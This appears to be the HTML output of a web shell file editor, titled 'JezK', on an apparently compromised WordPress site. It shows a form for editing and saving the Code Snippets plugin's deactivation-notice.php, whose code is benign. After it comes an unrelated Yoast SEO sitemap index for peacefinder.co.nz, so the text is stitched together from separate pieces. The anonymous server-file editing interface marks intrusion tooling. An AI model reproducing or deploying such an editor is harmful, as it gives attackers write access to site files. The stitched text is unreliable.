
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: deactivation-notice.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * File loaded when the plugin cannot be activated.
 *
 * All code in this file should be compatible with PHP 5.2 or later.
 *
 * @package      Code_Snippets
 *
 * @noinspection PhpNestedDirNameCallsCanBeReplacedWithLevelParameterInspection
 *
 * phpcs:disable Modernize.FunctionCalls.Dirname.FileConstant
 */

if ( ! defined( &#039;ABSPATH&#039; ) || function_exists( &#039;code_snippets_deactivation_notice&#039; ) ) {
	return;
}

/**
 * Deactivate the plugin and display a notice informing the user that this has happened.
 *
 * @return void
 *
 * @since 3.3.0
 */
function code_snippets_deactivation_notice() {
	$plugins = array();
	$required_php_version = &#039;7.4&#039;;

	if ( version_compare( phpversion(), $required_php_version, &#039;&lt;&#039; ) ) {
		$plugins[] = plugin_basename( dirname( dirname( __FILE__ ) ) . &#039;/code-snippets.php&#039; );

		printf(
			&#039;&lt;div class=&quot;code-snippets-notice error fade&quot; role=&quot;region&quot; aria-label=&quot;%s&quot;&gt;&lt;p&gt;&lt;strong&gt;%s&lt;/strong&gt;&#039;,
			esc_attr__( &#039;Code Snippets PHP version notice&#039;, &#039;code-snippets&#039; ),
			// translators: %s: required PHP version number.
			esc_html( sprintf( __( &#039;Code Snippets requires PHP %s or later.&#039;, &#039;code-snippets&#039; ), $required_php_version ) )
		);

		$update_url = function_exists( &#039;wp_get_default_update_php_url&#039; ) ?
			wp_get_default_update_php_url() :
			&#039;https://wordpress.org/support/update-php/&#039;;

		// translators: %s: Update PHP URL.
		$update_text = __( &#039;Please &lt;a href=&quot;%s&quot;&gt;upgrade your server to the latest version of PHP&lt;/a&gt; to continue using Code Snippets.&#039;, &#039;code-snippets&#039; );

		echo &#039;&lt;br&gt;&#039;, wp_kses( sprintf( $update_text, $update_url ), array( &#039;a&#039; =&gt; array( &#039;href&#039; =&gt; array() ) ) );
		echo &#039;&lt;/p&gt;&lt;/div&gt;&#039;;
	}

	if ( defined( &#039;CODE_SNIPPETS_FILE&#039; ) ) {
		$plugins[] = &#039;code-snippets/code-snippets.php&#039;;

		printf(
			&#039;&lt;div class=&quot;code-snippets-notice error fade&quot; role=&quot;region&quot; aria-label=&quot;%s&quot;&gt;&lt;p&gt;%s&lt;/p&gt;&lt;/div&gt;&#039;,
			esc_attr__( &#039;Code Snippets duplicate plugin notice&#039;, &#039;code-snippets&#039; ),
			esc_html__( &#039;Another version of Code Snippets appears to be installed. Deactivating this version.&#039;, &#039;code-snippets&#039; )
		);
	}

	if ( $plugins ) {
		require_once ABSPATH . &#039;wp-admin/includes/plugin.php&#039;;
		deactivate_plugins( array_unique( $plugins ) );
	}
}

add_action( &#039;admin_notices&#039;, &#039;code_snippets_deactivation_notice&#039; );
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//peacefinder.co.nz/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://peacefinder.co.nz/post-sitemap.xml</loc>
		<lastmod>2025-05-09T06:53:29+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/page-sitemap.xml</loc>
		<lastmod>2026-05-02T11:57:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/listings-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/product-sitemap.xml</loc>
		<lastmod>2025-03-22T07:11:30+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/listing_template-sitemap.xml</loc>
		<lastmod>2025-05-08T11:33:26+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/elementor-hf-sitemap.xml</loc>
		<lastmod>2025-03-28T03:15:48+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/category-sitemap.xml</loc>
		<lastmod>2025-05-09T06:50:39+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/condition-sitemap.xml</loc>
		<lastmod>2025-09-25T21:26:17+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/make-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/serie-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/body-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/ca-year-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/mileage-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/transmission-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/engine-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/exterior-color-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/fuel-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/price-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/drive-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/interior-color-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/stm_additional_features-sitemap.xml</loc>
		<lastmod>2026-05-02T11:53:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://peacefinder.co.nz/author-sitemap.xml</loc>
		<lastmod>2025-05-22T10:05:43+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->